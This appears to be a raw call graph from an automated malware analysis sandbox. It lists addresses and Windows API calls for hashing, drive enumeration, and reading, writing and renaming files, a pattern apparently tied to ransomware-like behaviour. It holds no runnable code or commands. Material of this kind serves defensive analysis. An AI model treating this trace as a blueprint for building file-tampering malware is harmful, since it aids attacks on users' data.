39831 bdf23e 59 API calls 39828->39831 39829->39824 39834 ba3ed4 39829->39834 39832 ba6760 59 API calls 39830->39832 39830->39838 39833 ba3fc5 39831->39833 39832->39838 39835 ba3ff0 59 API calls 39833->39835 39836 ba3ed9 39834->39836 39837 ba3eef 39834->39837 39839 ba3fdf 39835->39839 40182 ba3da0 59 API calls ___check_float_string 39836->40182 40183 ba3da0 59 API calls ___check_float_string 39837->40183 39838->39530 39839->39530 39842 ba3ee9 39842->39530 39843 ba3eff 39843->39530 39845 b9d27d CoInitializeSecurity 39844->39845 39850 b9d276 39844->39850 39846 ba4690 59 API calls 39845->39846 39847 b9d2b8 CoCreateInstance 39846->39847 39848 b9da3c CoUninitialize 39847->39848 39849 b9d2e3 VariantInit VariantInit VariantInit VariantInit 39847->39849 39848->39850 39851 b9d38e VariantClear VariantClear VariantClear VariantClear 39849->39851 39850->39571 39852 b9d3cc CoUninitialize 39851->39852 39853 b9d3e2 39851->39853 39852->39850 40184 b9b140 39853->40184 39856 b9d3f6 40189 b9b1d0 39856->40189 39858 b9d422 39859 b9d43c 39858->39859 39860 b9d426 CoUninitialize 39858->39860 39861 b9b140 60 API calls 39859->39861 39860->39850 39863 b9d449 39861->39863 39864 b9b1d0 SysFreeString 39863->39864 39865 b9d471 39864->39865 39866 b9d4ac 39865->39866 39867 b9d496 CoUninitialize 39865->39867 39869 b9b140 60 API calls 39866->39869 39924 b9d8cf 39866->39924 39867->39850 39870 b9d4d5 39869->39870 39871 b9b1d0 SysFreeString 39870->39871 39872 b9d4fd 39871->39872 39873 b9b140 60 API calls 39872->39873 39872->39924 39874 b9d5ae 39873->39874 39875 b9b1d0 SysFreeString 39874->39875 39876 b9d5d6 39875->39876 39877 b9b140 60 API calls 39876->39877 39876->39924 39878 b9d679 39877->39878 39879 b9b1d0 SysFreeString 39878->39879 39880 b9d6a1 39879->39880 39881 b9b140 60 API calls 39880->39881 39880->39924 39882 b9d6b6 39881->39882 39883 b9b1d0 SysFreeString 39882->39883 39884 b9d6de 39883->39884 39885 b9b140 60 API calls 39884->39885 39884->39924 39886 b9d707 39885->39886 39887 b9b1d0 SysFreeString 39886->39887 39888 b9d72f 39887->39888 39889 b9b140 60 API calls 39888->39889 39888->39924 39890 b9d744 39889->39890 39891 b9b1d0 SysFreeString 39890->39891 39892 b9d76c 39891->39892 39892->39924 40193 bb3aaf GetSystemTimeAsFileTime 39892->40193 39894 b9d77d 40195 bb3551 39894->40195 39899 ba2c40 59 API calls 39900 b9d7b5 39899->39900 39901 ba2900 60 API calls 39900->39901 39902 b9d7c3 39901->39902 39903 b9b140 60 API calls 39902->39903 39904 b9d7db 39903->39904 39905 b9b1d0 SysFreeString 39904->39905 39906 b9d7ff 39905->39906 39907 b9b140 60 API calls 39906->39907 39906->39924 39908 b9d8a3 39907->39908 39909 b9b1d0 SysFreeString 39908->39909 39910 b9d8cb 39909->39910 39911 b9b140 60 API calls 39910->39911 39910->39924 39912 b9d8ea 39911->39912 39913 b9b1d0 SysFreeString 39912->39913 39914 b9d912 39913->39914 39914->39924 40203 b9b400 SysAllocString 39914->40203 39916 b9d936 VariantInit VariantInit 39917 b9b140 60 API calls 39916->39917 39918 b9d985 39917->39918 39919 b9b1d0 SysFreeString 39918->39919 39920 b9d9e7 VariantClear VariantClear VariantClear 39919->39920 39921 b9da10 39920->39921 39922 b9da46 CoUninitialize 39920->39922 40207 bb052a 78 API calls swprintf 39921->40207 39922->39850 39924->39848 40358 b9e670 39926->40358 39928 b9e79e 39929 ba3ea0 59 API calls 39928->39929 39930 b9e7c3 39929->39930 39931 ba3ff0 59 API calls 39930->39931 39932 b9e7ff 39931->39932 40384 b9e870 39932->40384 39934 b9e806 39935 ba3ff0 59 API calls 39934->39935 39936 b9e80d 39934->39936 39935->39936 39936->39590 40628 ba3c40 39937->40628 39939 ba288c WideCharToMultiByte 40638 ba84e0 39939->40638 39941 ba28cf 39941->39593 39943 ba101a 39942->39943 39944 ba102b CryptCreateHash 39942->39944 40647 bc0eca RaiseException 39943->40647 39946 ba1056 lstrlenA CryptHashData 39944->39946 39947 ba1045 39944->39947 39949 ba106e 39946->39949 39950 ba107f CryptGetHashParam 39946->39950 40648 bc0eca RaiseException 39947->40648 40649 bc0eca RaiseException 39949->40649 39952 ba109f 39950->39952 39954 ba10b0 _memset 39950->39954 40650 bc0eca RaiseException 39952->40650 39955 ba10cf CryptGetHashParam 39954->39955 39956 ba10e4 39955->39956 39957 ba10f5 39955->39957 40651 bc0eca RaiseException 39956->40651 39959 bb0c62 _malloc 58 API calls 39957->39959 39960 ba1105 _memset 39959->39960 39961 ba1148 39960->39961 39963 bb04a6 _sprintf 83 API calls 39960->39963 39962 ba114e CryptDestroyHash CryptReleaseContext 39961->39962 39962->39595 39964 ba1133 lstrcatA 39963->39964 39964->39960 39964->39961 39966 ba3a90 59 API calls 39965->39966 39967 ba294c MultiByteToWideChar 39966->39967 39968 ba8400 59 API calls 39967->39968 39969 ba298d 39968->39969 39969->39614 39971 ba3591 39970->39971 39972 ba35d6 39970->39972 39971->39972 39973 ba3597 39971->39973 39975 ba35b7 39972->39975 40653 ba4f70 59 API calls 39972->40653 39973->39975 40652 ba4f70 59 API calls 39973->40652 39975->39633 39978 ba2dec 39977->39978 39981 ba2dfa 39977->39981 39979 ba3ea0 59 API calls 39978->39979 39980 ba2df5 39979->39980 39980->39689 39982 ba3ea0 59 API calls 39981->39982 39983 ba2e11 39982->39983 39983->39689 39985 ba2c5f 39984->39985 39986 ba2c71 39984->39986 39987 ba56d0 59 API calls 39985->39987 39989 ba56d0 59 API calls 39986->39989 39988 ba2c6a 39987->39988 39988->39694 39990 ba2c8a 39989->39990 39990->39694 39992 ba3ff0 59 API calls 39991->39992 39993 ba2c13 39992->39993 39994 b9ecb0 39993->39994 39996 b9ece5 39994->39996 39997 b9eefc 39996->39997 40654 bb1b3b 59 API calls 3 library calls 39996->40654 39997->39720 39998 ba56d0 59 API calls 40001 b9ed6b _memmove 39998->40001 39999 ba5230 59 API calls 39999->40001 40001->39997 40001->39998 40001->39999 40655 bb1b3b 59 API calls 3 library calls 40001->40655 40003 ba3742 40002->40003 40004 ba36e7 40002->40004 40009 ba370d 40003->40009 40657 ba4f70 59 API calls 40003->40657 40004->40003 40005 ba36ed 40004->40005 40005->40009 40656 ba4f70 59 API calls 40005->40656 40007 ba377f 40011 b9ca70 40007->40011 40009->40007 40010 ba4690 59 API calls 40009->40010 40010->40007 40012 b9cb64 40011->40012 40016 b9caa3 40011->40016 40012->39702 40013 b9cb6b 40658 bdf26c 59 API calls 3 library calls 40013->40658 40015 b9cb75 40015->39702 40016->40012 40016->40013 40017 ba36c0 59 API calls 40016->40017 40017->40016 40019 ba4690 59 API calls 40018->40019 40020 ba30d4 40019->40020 40021 b9c740 40020->40021 40659 bb0fdd 40021->40659 40024 b9c944 CreateDirectoryW 40027 bb0fdd 115 API calls 40024->40027 40026 b9c79e _memmove 40029 b9c906 40026->40029 40041 ba5c10 59 API calls 40026->40041 40043 ba4f70 59 API calls 40026->40043 40689 bb1101 76 API calls 5 library calls 40026->40689 40690 bb0546 58 API calls __woutput_s_l 40026->40690 40034 b9c960 40027->40034 40028 b9c90e 40028->40024 40035 b9c96a 40028->40035 40030 bb3a38 __fcloseall 83 API calls 40029->40030 40030->40028 40031 b9c9d5 40662 bb28fd 40031->40662 40034->40031 40034->40035 40040 bb28fd _fputws 82 API calls 40034->40040 40035->39708 40036 b9c9ed 40038 bb28fd _fputws 82 API calls 40036->40038 40039 b9c9f8 40038->40039 40675 bb3a38 40039->40675 40040->40034 40041->40026 40043->40026 40045 ba1223 GetFileSizeEx 40044->40045 40061 ba1287 40044->40061 40046 ba12a3 VirtualAlloc 40045->40046 40047 ba1234 40045->40047 40048 ba131a CloseHandle 40046->40048 40053 ba12c0 _memset 40046->40053 40047->40046 40049 ba123c CloseHandle 40047->40049 40048->39711 40050 ba3100 59 API calls 40049->40050 40051 ba1253 40050->40051 40923 ba59d0 40051->40923 40055 ba12e9 SetFilePointerEx 40053->40055 40088 ba13a7 40053->40088 40054 ba126a MoveFileW 40054->40061 40057 ba130c VirtualFree 40055->40057 40058 ba1332 ReadFile 40055->40058 40056 ba13b7 SetFilePointer 40059 ba13f5 ReadFile 40056->40059 40127 ba15ae 40056->40127 40057->40048 40058->40057 40062 ba134f 40058->40062 40063 ba140f VirtualFree CloseHandle 40059->40063 40064 ba1440 40059->40064 40060 ba15c5 SetFilePointerEx 40060->40063 40067 ba15df 40060->40067 40061->39711 40062->40057 40065 ba1356 40062->40065 40066 ba142f 40063->40066 40069 ba1718 lstrlenA 40064->40069 40070 ba1471 lstrlenA 40064->40070 40064->40127 40065->40056 40071 ba2c40 59 API calls 40065->40071 40066->39711 40068 ba15ed WriteFile 40067->40068 40072 ba1602 40067->40072 40068->40063 40068->40072 41001 bb0be4 40069->41001 40949 bb0be4 40070->40949 40076 ba1364 40071->40076 40074 ba30b0 59 API calls 40072->40074 40078 ba1631 40074->40078 40087 ba1379 VirtualFree CloseHandle 40076->40087 40076->40088 40081 ba2840 60 API calls 40078->40081 40085 ba163c WriteFile 40081->40085 40093 ba1658 40085->40093 40091 ba1396 40087->40091 40088->40056 40091->39711 40093->40063 40094 ba1660 lstrlenA WriteFile 40093->40094 40094->40063 40095 ba1686 CloseHandle 40094->40095 40097 ba3100 59 API calls 40095->40097 40098 ba16a3 40097->40098 40099 ba59d0 59 API calls 40098->40099 40101 ba16be MoveFileW 40099->40101 40103 ba16e4 VirtualFree 40101->40103 40107 ba18a7 40101->40107 40108 ba16fc 40103->40108 40111 ba18e3 40107->40111 40112 ba18d5 VirtualFree 40107->40112 40108->39711 40111->40061 40115 ba18e8 CloseHandle 40111->40115 40112->40111 40115->40061 40127->40060 40129->39713 40131 bababb ShowWindow UpdateWindow 40130->40131 40132 babab9 40130->40132 40131->39716 40132->39716 40139 ba0a81 40133->40139 40134 ba56d0 59 API calls 40134->40139 40135 ba0bb4 40135->39721 40136 ba3ea0 59 API calls 40137 ba0ae0 SetErrorMode PathFileExistsA SetErrorMode 40136->40137 40138 ba0b0c GetDriveTypeA 40137->40138 40137->40139 40138->40139 40139->40134 40139->40135 40139->40136 40140 ba3ff0 59 API calls 40139->40140 40141 ba2900 60 API calls 40139->40141 40142 ba3580 59 API calls 40139->40142 40140->40139 40141->40139 40142->40139 40143->39747 41090 baf130 timeGetTime 40143->41090 40144->39727 41294 bafd80 40144->41294 40145->39502 40146->39538 40148 ba1ad0 40147->40148 40149 ba1af4 40147->40149 40150 ba1afc 40148->40150 40151 ba1adc DispatchMessageW PeekMessageW 40148->40151 40149->39544 40150->39544 40151->40148 40151->40149 40152->39545 40153->39687 40154->39720 40156 ba3ff0 59 API calls 40155->40156 40157 ba303e 40156->40157 40157->39784 40160 ba5dfe 40159->40160 40161 ba5d66 40159->40161 40162 bdf23e 59 API calls 40160->40162 40163 ba6950 59 API calls 40161->40163 40168 ba5d84 ___check_float_string 40161->40168 40164 ba5e08 40162->40164 40165 ba5d76 40163->40165 40166 bdf23e 59 API calls 40164->40166 40165->39802 40167 ba5e1a 40166->40167 40167->39802 40168->39802 40169->39802 40171 bb0241 40170->40171 40172 bb02b6 40170->40172 40174 bb5208 __woutput_s_l 58 API calls 40171->40174 40179 bb0266 40171->40179 40181 bb02c8 60 API calls 3 library calls 40172->40181 40176 bb024d 40174->40176 40175 bb02c3 40175->39816 40180 bb42d2 9 API calls __invalid_parameter_noinfo_noreturn 40176->40180 40178 bb0258 40178->39816 40179->39816 40180->40178 40181->40175 40182->39842 40183->39843 40185 bb3b4c 59 API calls 40184->40185 40186 b9b164 40185->40186 40187 b9b177 SysAllocString 40186->40187 40188 b9b194 40186->40188 40187->40188 40188->39856 40190 b9b202 40189->40190 40191 b9b1de 40189->40191 40190->39858 40191->40190 40192 b9b1f5 SysFreeString 40191->40192 40192->40190 40194 bb3add __aulldiv 40193->40194 40194->39894 40208 bc035d 40195->40208 40197 bb355a 40198 b9d78f 40197->40198 40216 bb3576 40197->40216 40200 bb28e0 40198->40200 40311 bb279f 40200->40311 40204 b9b41d 40203->40204 40205 b9b423 40203->40205 40204->39916 40206 b9b42d VariantClear 40205->40206 40206->39916 40207->39924 40209 bb501f __getptd_noexit 58 API calls 40208->40209 40210 bc0363 40209->40210 40211 bc0369 40210->40211 40213 bc038d 40210->40213 40215 bb8cde __malloc_crt 58 API calls 40210->40215 40212 bb5208 __woutput_s_l 58 API calls 40211->40212 40211->40213 40214 bc036e 40212->40214 40213->40197 40214->40197 40215->40211 40217 bb35a9 _memset 40216->40217 40218 bb3591 40216->40218 40217->40218 40225 bb35c0 40217->40225 40219 bb5208 __woutput_s_l 58 API calls 40218->40219 40220 bb3596 40219->40220 40257 bb42d2 9 API calls __invalid_parameter_noinfo_noreturn 40220->40257 40222 bb35cb 40224 bb5208 __woutput_s_l 58 API calls 40222->40224 40223 bb35e9 40249 bbfb64 40223->40249 40248 bb35a0 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 40224->40248 40225->40222 40225->40223 40227 bb35ee 40258 bbf803 58 API calls __woutput_s_l 40227->40258 40229 bb35f7 40230 bb37e5 40229->40230 40259 bbf82d 58 API calls __woutput_s_l 40229->40259 40272 bb42fd 8 API calls 2 library calls 40230->40272 40233 bb3609 40233->40230 40260 bbf857 40233->40260 40234 bb37ef 40236 bb361b 40236->40230 40237 bb3624 40236->40237 40238 bb369b 40237->40238 40240 bb3637 40237->40240 40270 bbf939 58 API calls 4 library calls 40238->40270 40267 bbf939 58 API calls 4 library calls 40240->40267 40241 bb36a2 40241->40248 40271 bbfbb4 58 API calls 4 library calls 40241->40271 40243 bb364f 40243->40248 40268 bbfbb4 58 API calls 4 library calls 40243->40268 40246 bb3668 40246->40248 40269 bbf939 58 API calls 4 library calls 40246->40269 40248->40198 40250 bbfb70 __alloc_osfhnd 40249->40250 40251 bbfba5 __alloc_osfhnd 40250->40251 40252 bb8af7 __lock 58 API calls 40250->40252 40251->40227 40253 bbfb80 40252->40253 40254 bbfb93 40253->40254 40273 bbfe47 40253->40273 40302 bbfbab LeaveCriticalSection _doexit 40254->40302 40257->40248 40258->40229 40259->40233 40261 bbf861 40260->40261 40262 bbf876 40260->40262 40263 bb5208 __woutput_s_l 58 API calls 40261->40263 40262->40236 40264 bbf866 40263->40264 40310 bb42d2 9 API calls __invalid_parameter_noinfo_noreturn 40264->40310 40266 bbf871 40266->40236 40267->40243 40268->40246 40269->40248 40270->40241 40271->40248 40272->40234 40274 bbfe53 __alloc_osfhnd 40273->40274 40275 bb8af7 __lock 58 API calls 40274->40275 40276 bbfe71 __tzset_nolock 40275->40276 40277 bbf857 __tzset_nolock 58 API calls 40276->40277 40278 bbfe86 40277->40278 40291 bbff25 __tzset_nolock __isindst_nolock 40278->40291 40303 bbf803 58 API calls __woutput_s_l 40278->40303 40281 bbfe98 40281->40291 40304 bbf82d 58 API calls __woutput_s_l 40281->40304 40282 bbff71 GetTimeZoneInformation 40282->40291 40283 bb0bed _free 58 API calls 40283->40291 40285 bbfeaa 40285->40291 40305 bc3f99 58 API calls 2 library calls 40285->40305 40287 bbffd8 WideCharToMultiByte 40287->40291 40288 bbfeb8 40306 bd1667 78 API calls 3 library calls 40288->40306 40290 bc0010 WideCharToMultiByte 40290->40291 40291->40282 40291->40283 40291->40287 40291->40290 40294 bcff8e 58 API calls __tzset_nolock 40291->40294 40300 bc0157 __alloc_osfhnd __tzset_nolock __isindst_nolock 40291->40300 40301 bb3c2d 61 API calls __tzset_nolock 40291->40301 40308 bb42fd 8 API calls 2 library calls 40291->40308 40309 bc00d7 LeaveCriticalSection _doexit 40291->40309 40292 bbfed9 ___TypeMatch 40292->40291 40296 bb0bed _free 58 API calls 40292->40296 40297 bbff0c _strlen 40292->40297 40294->40291 40295 bb8cde __malloc_crt 58 API calls 40298 bbff1a _strlen 40295->40298 40296->40297 40297->40295 40298->40291 40307 bbc0fd 58 API calls __woutput_s_l 40298->40307 40300->40254 40301->40291 40302->40251 40303->40281 40304->40285 40305->40288 40306->40292 40307->40291 40308->40291 40309->40291 40310->40266 40338 bb019c 40311->40338 40313 bb27d4 40314 bb5208 __woutput_s_l 58 API calls 40313->40314 40316 bb27d9 40314->40316 40346 bb42d2 9 API calls __invalid_parameter_noinfo_noreturn 40316->40346 40317 bb27e9 MultiByteToWideChar 40320 bb2815 40317->40320 40321 bb2804 GetLastError 40317->40321 40319 b9d7a3 40319->39899 40322 bb8cde __malloc_crt 58 API calls 40320->40322 40347 bb51e7 58 API calls 3 library calls 40321->40347 40325 bb281d 40322->40325 40324 bb2810 40327 bb0bed _free 58 API calls 40324->40327 40325->40324 40326 bb2825 MultiByteToWideChar 40325->40326 40326->40321 40328 bb283f 40326->40328 40329 bb28a0 40327->40329 40330 bb8cde __malloc_crt 58 API calls 40328->40330 40331 bb0bed _free 58 API calls 40329->40331 40332 bb284a 40330->40332 40331->40319 40332->40324 40348 bbd51e 88 API calls 3 library calls 40332->40348 40334 bb2866 40334->40324 40335 bb286f WideCharToMultiByte 40334->40335 40335->40324 40336 bb288b GetLastError 40335->40336 40349 bb51e7 58 API calls 3 library calls 40336->40349 40339 bb01ad 40338->40339 40340 bb01fa 40338->40340 40350 bb5007 40339->40350 40340->40313 40340->40317 40342 bb01b3 40343 bb01da 40342->40343 40355 bb45dc 58 API calls 6 library calls 40342->40355 40343->40340 40356 bb495e 58 API calls 6 library calls 40343->40356 40346->40319 40347->40324 40348->40334 40349->40324 40351 bb501f __getptd_noexit 58 API calls 40350->40351 40352 bb500d 40351->40352 40354 bb501a 40352->40354 40357 bb7c2e 58 API calls 3 library calls 40352->40357 40354->40342 40355->40343 40356->40340 40359 bb0c62 _malloc 58 API calls 40358->40359 40360 b9e684 40359->40360 40361 bb0c62 _malloc 58 API calls 40360->40361 40362 b9e690 40361->40362 40363 b9e699 40362->40363 40364 b9e6b4 GetAdaptersInfo 40362->40364 40365 bb1f2d _wprintf 85 API calls 40363->40365 40366 b9e6db GetAdaptersInfo 40364->40366 40367 b9e6c4 40364->40367 40369 b9e6a3 40365->40369 40368 b9e6ea 40366->40368 40383 b9e741 40366->40383 40370 bb0bed _free 58 API calls 40367->40370 40408 bb04a6 40368->40408 40372 bb0bed _free 58 API calls 40369->40372 40374 b9e6ca 40370->40374 40376 b9e6a9 40372->40376 40373 bb0bed _free 58 API calls 40377 b9e74a 40373->40377 40378 bb0c62 _malloc 58 API calls 40374->40378 40376->39928 40377->39928 40379 b9e6d2 40378->40379 40379->40363 40379->40366 40381 b9e737 40382 bb1f2d _wprintf 85 API calls 40381->40382 40382->40383 40383->40373 40385 ba56d0 59 API calls 40384->40385 40386 b9e8bb CryptAcquireContextW 40385->40386 40387 b9e8e9 CryptCreateHash 40386->40387 40388 b9e8d8 40386->40388 40390 b9e903 40387->40390 40391 b9e914 CryptHashData 40387->40391 40623 bc0eca RaiseException 40388->40623 40624 bc0eca RaiseException 40390->40624 40393 b9e943 CryptGetHashParam 40391->40393 40394 b9e932 40391->40394 40396 b9e963 40393->40396 40398 b9e974 _memset 40393->40398 40625 bc0eca RaiseException 40394->40625 40626 bc0eca RaiseException 40396->40626 40399 b9e993 CryptGetHashParam 40398->40399 40400 b9e9a8 40399->40400 40407 b9e9b9 40399->40407 40627 bc0eca RaiseException 40400->40627 40402 b9ea10 40404 b9ea16 CryptDestroyHash CryptReleaseContext 40402->40404 40403 bb04a6 _sprintf 83 API calls 40403->40407 40405 b9ea33 40404->40405 40405->39934 40406 ba3ea0 59 API calls 40406->40407 40407->40402 40407->40403 40407->40406 40409 bb04c2 40408->40409 40410 bb04d7 40408->40410 40411 bb5208 __woutput_s_l 58 API calls 40409->40411 40410->40409 40412 bb04de 40410->40412 40414 bb04c7 40411->40414 40437 bb6ab6 40412->40437 40436 bb42d2 9 API calls __invalid_parameter_noinfo_noreturn 40414->40436 40415 bb0504 40417 b9e725 40415->40417 40461 bb64ef 78 API calls 7 library calls 40415->40461 40419 bb1f2d 40417->40419 40420 bb1f39 __alloc_osfhnd 40419->40420 40421 bb1f4a 40420->40421 40422 bb1f5f _vwprintf_helper 40420->40422 40423 bb5208 __woutput_s_l 58 API calls 40421->40423 40472 bb0e92 40422->40472 40424 bb1f4f 40423->40424 40488 bb42d2 9 API calls __invalid_parameter_noinfo_noreturn 40424->40488 40427 bb1f6f _vwprintf_helper 40477 bbafd2 40427->40477 40428 bb1f5a __alloc_osfhnd 40428->40381 40430 bb1f82 _vwprintf_helper 40431 bb6ab6 __output_l 83 API calls 40430->40431 40432 bb1f9b _vwprintf_helper 40431->40432 40484 bbafa1 40432->40484 40436->40417 40438 bb019c _LocaleUpdate::_LocaleUpdate 58 API calls 40437->40438 40439 bb6b2b 40438->40439 40440 bb5208 __woutput_s_l 58 API calls 40439->40440 40441 bb6b30 40440->40441 40442 bb7601 40441->40442 40454 bb6b50 __aulldvrm __woutput_s_l _strlen 40441->40454 40462 bb816b 40441->40462 40443 bb5208 __woutput_s_l 58 API calls 40442->40443 40444 bb7606 40443->40444 40470 bb42d2 9 API calls __invalid_parameter_noinfo_noreturn 40444->40470 40447 bb75db 40448 bba77e __woutput_s_l 6 API calls 40447->40448 40449 bb75fd 40448->40449 40449->40415 40451 bb766a 78 API calls _write_multi_char 40451->40454 40452 bb71b9 DecodePointer 40452->40454 40453 bb0bed _free 58 API calls 40453->40454 40454->40442 40454->40447 40454->40451 40454->40452 40454->40453 40455 bb8cde __malloc_crt 58 API calls 40454->40455 40456 bb721c DecodePointer 40454->40456 40457 bb7241 DecodePointer 40454->40457 40458 bcadf7 60 API calls __cftof 40454->40458 40459 bb76de 78 API calls _write_string 40454->40459 40460 bb76b2 78 API calls _write_multi_char 40454->40460 40469 bb2bcc 58 API calls _LocaleUpdate::_LocaleUpdate 40454->40469 40455->40454 40456->40454 40457->40454 40458->40454 40459->40454 40460->40454 40461->40417 40463 bb818a 40462->40463 40464 bb8175 40462->40464 40463->40454 40465 bb5208 __woutput_s_l 58 API calls 40464->40465 40466 bb817a 40465->40466 40471 bb42d2 9 API calls __invalid_parameter_noinfo_noreturn 40466->40471 40468 bb8185 40468->40454 40469->40454 40470->40447 40471->40468 40473 bb0e9d 40472->40473 40474 bb0eb3 EnterCriticalSection 40472->40474 40475 bb8af7 __lock 58 API calls 40473->40475 40474->40427 40476 bb0ea6 40475->40476 40476->40427 40478 bb816b __fclose_nolock 58 API calls 40477->40478 40479 bbafdf 40478->40479 40490 bc89c2 40479->40490 40481 bbafe5 _vwprintf_helper 40482 bbb034 40481->40482 40483 bb8cde __malloc_crt 58 API calls 40481->40483 40482->40430 40483->40482 40485 bbafaa 40484->40485 40486 bb1faf 40484->40486 40485->40486 40500 bb836b 40485->40500 40489 bb1fc9 LeaveCriticalSection LeaveCriticalSection _vwprintf_helper __getstream 40486->40489 40488->40428 40489->40428 40491 bc89cd 40490->40491 40492 bc89da 40490->40492 40493 bb5208 __woutput_s_l 58 API calls 40491->40493 40495 bc89e6 40492->40495 40496 bb5208 __woutput_s_l 58 API calls 40492->40496 40494 bc89d2 40493->40494 40494->40481 40495->40481 40497 bc8a07 40496->40497 40499 bb42d2 9 API calls __invalid_parameter_noinfo_noreturn 40497->40499 40499->40494 40501 bb837e 40500->40501 40505 bb83a2 40500->40505 40502 bb816b __fclose_nolock 58 API calls 40501->40502 40501->40505 40503 bb839b 40502->40503 40506 bbdf14 40503->40506 40505->40486 40507 bbdf20 __alloc_osfhnd 40506->40507 40508 bbdf2d 40507->40508 40509 bbdf44 40507->40509 40606 bb51d4 58 API calls __getptd_noexit 40508->40606 40510 bbdfe3 40509->40510 40512 bbdf58 40509->40512 40610 bb51d4 58 API calls __getptd_noexit 40510->40610 40516 bbdf80 40512->40516 40517 bbdf76 40512->40517 40514 bbdf32 40515 bb5208 __woutput_s_l 58 API calls 40514->40515 40519 bbdf39 __alloc_osfhnd 40515->40519 40534 bcb134 40516->40534 40607 bb51d4 58 API calls __getptd_noexit 40517->40607 40518 bbdf7b 40523 bb5208 __woutput_s_l 58 API calls 40518->40523 40519->40505 40522 bbdf86 40524 bbdf99 40522->40524 40525 bbdfac 40522->40525 40526 bbdfef 40523->40526 40543 bbe003 40524->40543 40529 bb5208 __woutput_s_l 58 API calls 40525->40529 40611 bb42d2 9 API calls __invalid_parameter_noinfo_noreturn 40526->40611 40530 bbdfb1 40529->40530 40608 bb51d4 58 API calls __getptd_noexit 40530->40608 40531 bbdfa5 40609 bbdfdb LeaveCriticalSection __unlock_fhandle 40531->40609 40535 bcb140 __alloc_osfhnd 40534->40535 40536 bcb18f EnterCriticalSection 40535->40536 40537 bb8af7 __lock 58 API calls 40535->40537 40538 bcb1b5 __alloc_osfhnd 40536->40538 40539 bcb165 40537->40539 40538->40522 40542 bcb17d 40539->40542 40612 bc263e InitializeCriticalSectionAndSpinCount 40539->40612 40613 bcb1b9 LeaveCriticalSection _doexit 40542->40613 40544 bbe010 __write_nolock 40543->40544 40545 bbe04f 40544->40545 40546 bbe06e 40544->40546 40576 bbe044 40544->40576 40614 bb51d4 58 API calls __getptd_noexit 40545->40614 40549 bbe0aa 40546->40549 40550 bbe0c6 40546->40550 40547 bba77e __woutput_s_l 6 API calls 40551 bbe864 40547->40551 40616 bb51d4 58 API calls __getptd_noexit 40549->40616 40554 bbe0df 40550->40554 40618 bbf744 60 API calls 3 library calls 40550->40618 40551->40531 40552 bbe054 40555 bb5208 __woutput_s_l 58 API calls 40552->40555 40559 bc89c2 __write_nolock 58 API calls 40554->40559 40558 bbe05b 40555->40558 40556 bbe0af 40560 bb5208 __woutput_s_l 58 API calls 40556->40560 40615 bb42d2 9 API calls __invalid_parameter_noinfo_noreturn 40558->40615 40562 bbe0ed 40559->40562 40564 bbe0b6 40560->40564 40563 bbe446 40562->40563 40568 bb5007 _GetLcidFromCountry 58 API calls 40562->40568 40565 bbe7d9 WriteFile 40563->40565 40566 bbe464 40563->40566 40617 bb42d2 9 API calls __invalid_parameter_noinfo_noreturn 40564->40617 40569 bbe439 GetLastError 40565->40569 40570 bbe678 40565->40570 40571 bbe588 40566->40571 40579 bbe47a 40566->40579 40573 bbe119 GetConsoleMode 40568->40573 40572 bbe406 40569->40572 40570->40572 40582 bbe67d 40571->40582 40583 bbe593 40571->40583 40574 bbe812 40572->40574 40572->40576 40581 bbe566 40572->40581 40573->40563 40575 bbe158 40573->40575 40574->40576 40580 bb5208 __woutput_s_l 58 API calls 40574->40580 40575->40563 40577 bbe168 GetConsoleCP 40575->40577 40576->40547 40577->40574 40603 bbe197 40577->40603 40578 bbe4e9 WriteFile 40578->40569 40578->40579 40579->40572 40579->40574 40579->40578 40584 bbe840 40580->40584 40585 bbe809 40581->40585 40586 bbe571 40581->40586 40582->40574 40587 bbe6f2 WideCharToMultiByte 40582->40587 40583->40574 40588 bbe5f8 WriteFile 40583->40588 40622 bb51d4 58 API calls __getptd_noexit 40584->40622 40621 bb51e7 58 API calls 3 library calls 40585->40621 40591 bb5208 __woutput_s_l 58 API calls 40586->40591 40587->40569 40598 bbe739 40587->40598 40588->40569 40590 bbe647 40588->40590 40590->40570 40590->40572 40590->40583 40593 bbe576 40591->40593 40620 bb51d4 58 API calls __getptd_noexit 40593->40620 40594 bbe741 WriteFile 40597 bbe794 GetLastError 40594->40597 40594->40598 40597->40598 40598->40570 40598->40572 40598->40582 40598->40594 40599 bcc76c 60 API calls __write_nolock 40599->40603 40600 bd058c WriteConsoleW CreateFileW __putwch_nolock 40604 bbe2ed 40600->40604 40601 bbe280 WideCharToMultiByte 40601->40572 40602 bbe2bb WriteFile 40601->40602 40602->40569 40602->40604 40603->40572 40603->40599 40603->40601 40603->40604 40619 bb2d33 58 API calls __isleadbyte_l 40603->40619 40604->40569 40604->40572 40604->40600 40604->40603 40605 bbe315 WriteFile 40604->40605 40605->40569 40605->40604 40606->40514 40607->40518 40608->40531 40609->40519 40610->40518 40611->40519 40612->40542 40613->40536 40614->40552 40615->40576 40616->40556 40617->40576 40618->40554 40619->40603 40620->40576 40621->40576 40622->40576 40623->40387 40624->40391 40625->40393 40626->40398 40627->40407 40629 ba3c62 40628->40629 40636 ba3c74 _memset 40628->40636 40630 ba3c96 40629->40630 40631 ba3c67 40629->40631 40632 bdf23e 59 API calls 40630->40632 40633 bb3b4c 59 API calls 40631->40633 40634 ba3c6d 40632->40634 40633->40634 40634->40636 40645 bdf1bb 59 API calls 3 library calls 40634->40645 40636->39939 40639 ba8513 40638->40639 40643 ba8520 40638->40643 40639->40643 40646 ba5810 59 API calls ___check_float_string 40639->40646 40641 ba8619 40641->39941 40642 bdf23e 59 API calls 40642->40643 40643->40641 40643->40642 40644 ba6760 59 API calls 40643->40644 40644->40643 40646->40643 40647->39944 40648->39946 40649->39950 40650->39954 40651->39957 40652->39975 40653->39975 40654->40001 40655->40001 40656->40009 40657->40009 40658->40015 40691 bb1037 40659->40691 40661 b9c78a 40661->40028 40688 bb0546 58 API calls __woutput_s_l 40661->40688 40663 bb2909 __alloc_osfhnd 40662->40663 40664 bb291c 40663->40664 40666 bb2941 __wsetenvp 40663->40666 40665 bb5208 __woutput_s_l 58 API calls 40664->40665 40667 bb2921 40665->40667 40894 bb0e53 40666->40894 40893 bb42d2 9 API calls __invalid_parameter_noinfo_noreturn 40667->40893 40670 bb2981 40901 bb29a1 LeaveCriticalSection LeaveCriticalSection _vfwprintf_helper 40670->40901 40671 bb2950 40671->40670 40900 bbd6c7 80 API calls 5 library calls 40671->40900 40674 bb292c __alloc_osfhnd 40674->40036 40676 bb3a44 __alloc_osfhnd 40675->40676 40677 bb3a58 40676->40677 40678 bb3a70 40676->40678 40679 bb5208 __woutput_s_l 58 API calls 40677->40679 